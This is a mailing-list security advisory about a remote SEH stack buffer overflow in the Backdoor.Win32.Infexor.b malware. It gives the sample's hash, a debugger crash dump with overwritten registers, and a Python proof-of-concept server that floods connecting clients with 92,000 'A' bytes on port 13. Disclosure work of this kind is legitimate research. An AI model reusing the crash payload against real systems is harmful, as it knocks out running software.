lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 2 Jan 2021 17:57:25 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Infexor.b / Remote Buffer Overflow

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source:
http://malvuln.com/advisory/34c09f7fd6668c89a59ebdc8f12d1e7b.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Infexor.b
Vulnerability: Buffer Overflow
Description: Remote SEH Stack Buffer Overflow on HTTP server response
when connecting to TCP Port 13.

Type: PE32
MD5: 34c09f7fd6668c89a59ebdc8f12d1e7b
Vuln ID: MVID-2021-0010
Dropped files: C:\Windows\SysWOW64\kernel32.dll.exe
ASLR: False
Safe SEH: True
Disclosure: 01/01/2021

Memory Dump:
(12dc.1728): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000
eip=41414141 esp=03151480 ebp=031514a0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???
0:006> !exchain
0324ff70: 41414141
Invalid exception stack at 41414141

Exploit/PoC:
import socket

port=13
payload="A"*92000

def doit():
    global payload
    s = socket.socket()
    try:
        host = ''
        s.bind((host, port))
        s.listen(5)

        print('Backdoor.Win32.Infexor.b / Remote Stack Buffer Overflow')
        print('MD5: 34c09f7fd6668c89a59ebdc8f12d1e7b')
        print("By malvuln")

        while True:
            conn, addr = s.accept()
            conn.send(payload+'\r\n')
            conn.close()
    except Exception as e:
        pass

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occuring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ